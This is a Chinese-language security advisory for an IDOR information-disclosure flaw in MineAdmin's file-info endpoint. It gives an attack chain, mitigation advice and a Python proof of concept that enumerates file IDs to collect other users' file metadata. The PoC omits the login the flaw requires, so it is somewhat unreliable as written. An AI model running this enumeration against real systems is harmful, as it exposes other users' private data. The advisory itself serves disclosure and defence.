CVE-2026-1196 MineAdmin系统getFileInfoById接口信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-1196

漏洞类型

信息泄露

CVSS评分

3.1 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MineAdmin 1.x/2.x

漏洞概述

CVE-2026-1196是MineAdmin框架中的一个信息泄露安全漏洞。该漏洞存在于/system/getFileInfoById接口中，攻击者可以通过构造恶意的ID参数值来获取系统敏感文件信息。MineAdmin是一个基于现代PHP框架开发的企业级后台管理系统，广泛应用于各类Web应用场景。漏洞利用无需高权限认证，攻击者只需拥有低权限账号或利用社会工程学手段获取的凭据即可发起攻击。该漏洞的CVSS评分为3.1，属于低危级别，但由于攻击复杂度较高，实际利用难度相对较大。然而，漏洞已在公开渠道披露，攻击者可能已掌握相关利用技术。建议受影响用户尽快评估系统安全风险，采取相应的防护措施或等待官方安全更新。

技术细节

该漏洞属于IDOR（Insecure Direct Object Reference）类型的安全问题。在MineAdmin 1.x和2.x版本中，/system/getFileInfoById接口存在访问控制缺陷。系统未能正确验证用户请求的ID参数是否属于当前用户有权访问的资源。攻击者可以通过枚举或猜测其他用户的文件ID，绕过正常的权限检查机制，直接获取目标文件的元数据信息，包括文件路径、创建时间、文件大小等敏感信息。攻击者利用此漏洞可以：1）通过遍历ID范围获取系统中其他用户上传的私有文件信息；2）结合其他漏洞或攻击手段进一步获取文件实际内容；3）利用泄露的文件路径信息进行后续的路径遍历攻击。技术层面，漏洞源于API端点缺少对象级别的授权检查，数据库查询时仅验证用户登录状态而未验证资源所有权。修复方案应在文件访问逻辑中增加当前用户与文件所属用户的关联验证。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标网站是否使用MineAdmin框架，通过指纹识别技术检测系统版本（1.x或2.x）

STEP 2

步骤2: 认证获取

攻击者获取MineAdmin系统的低权限账户，可以通过默认凭据、弱密码、社会工程学或账户注册功能获取访问权限

STEP 3

步骤3: 接口探测

登录系统后，访问/system/getFileInfoById接口，确认该端点存在且可访问

STEP 4

步骤4: ID枚举攻击

攻击者构造恶意的ID参数值，通过自动化脚本枚举不同的文件ID（如1-1000），利用IDOR漏洞绕过权限检查

STEP 5

步骤5: 敏感信息提取

成功枚举的响应包含其他用户的文件元数据，如文件路径、创建时间、文件大小、文件所有者等信息

STEP 6

步骤6: 横向扩展

利用获取的文件路径信息，结合其他漏洞（如路径遍历、任意文件读取）获取文件实际内容，或进行进一步的内网渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-1196 PoC - MineAdmin Information Disclosure
# Target: MineAdmin 1.x/2.x
# Endpoint: /system/getFileInfoById

import requests
import json

TARGET_URL = "http://target-website.com"  # Replace with actual target
API_ENDPOINT = "/system/getFileInfoById"

def exploit_cve_2026_1196(target_url, file_id):
    """
    Exploit for CVE-2026-1196 Information Disclosure vulnerability
    in MineAdmin /system/getFileInfoById endpoint
    
    Args:
        target_url: Base URL of the vulnerable MineAdmin instance
        file_id: Integer ID of the file to retrieve info (can be enumerated)
    
    Returns:
        dict: Response containing file information if vulnerable
    """
    
    # Construct the vulnerable endpoint
    url = f"{target_url}{API_ENDPOINT}"
    
    # Prepare request parameters
    params = {
        "id": file_id  # Unvalidated ID parameter
    }
    
    # Headers (may require basic authentication)
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
    }
    
    try:
        # Send GET request to vulnerable endpoint
        response = requests.get(url, params=params, headers=headers, timeout=10)
        
        if response.status_code == 200:
            data = response.json()
            
            # Check if sensitive information is leaked
            if "data" in data or "file_path" in data or "path" in data:
                print(f"[!] Vulnerability confirmed! File ID: {file_id}")
                print(f"[+] Leaked information: {json.dumps(data, indent=2)}")
                return data
            else:
                print(f"[*] No sensitive data for File ID: {file_id}")
                return None
        else:
            print(f"[*] Request failed with status: {response.status_code}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Request error: {e}")
        return None

def enumerate_files(start_id=1, end_id=1000):
    """
    Enumerate file IDs to discover other users' files
    """
    leaked_files = []
    
    print(f"[*] Starting enumeration from ID {start_id} to {end_id}")
    
    for file_id in range(start_id, end_id + 1):
        result = exploit_cve_2026_1196(TARGET_URL, file_id)
        if result:
            leaked_files.append({"id": file_id, "data": result})
    
    print(f"\n[+] Total leaked files: {len(leaked_files)}")
    return leaked_files

if __name__ == "__main__":
    # Single file test
    print("[*] Testing single file ID...")
    exploit_cve_2026_1196(TARGET_URL, 1)
    
    # Or run enumeration
    # enumerate_files(1, 100)

影响范围

MineAdmin 1.x 所有版本

MineAdmin 2.x 所有版本

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）限制/system/getFileInfoById接口的访问权限，仅允许管理员访问；2）启用IP白名单访问控制，限制可访问该接口的来源IP；3）增加请求速率限制，阻止自动化枚举攻击；4）实施实时安全监控，检测异常的API访问行为；5）考虑暂时禁用该接口功能，待官方修复后再重新启用；6）加强用户账户安全管理，避免弱密码和默认凭据；7）定期备份系统数据，以便在发生安全事件时快速恢复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1196
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1196
3 Details https://www.cvedetails.com/cve/CVE-2026-1196/
4 VulDB https://vuldb.com/cve/CVE-2026-1196
5 Link https://github.com/SourByte05/MineAdmin-Vulnerability/issues/3
6 Link https://vuldb.com/?ctiid.341781
7 Link https://vuldb.com/?id.341781
8 Link https://vuldb.com/?submit.734273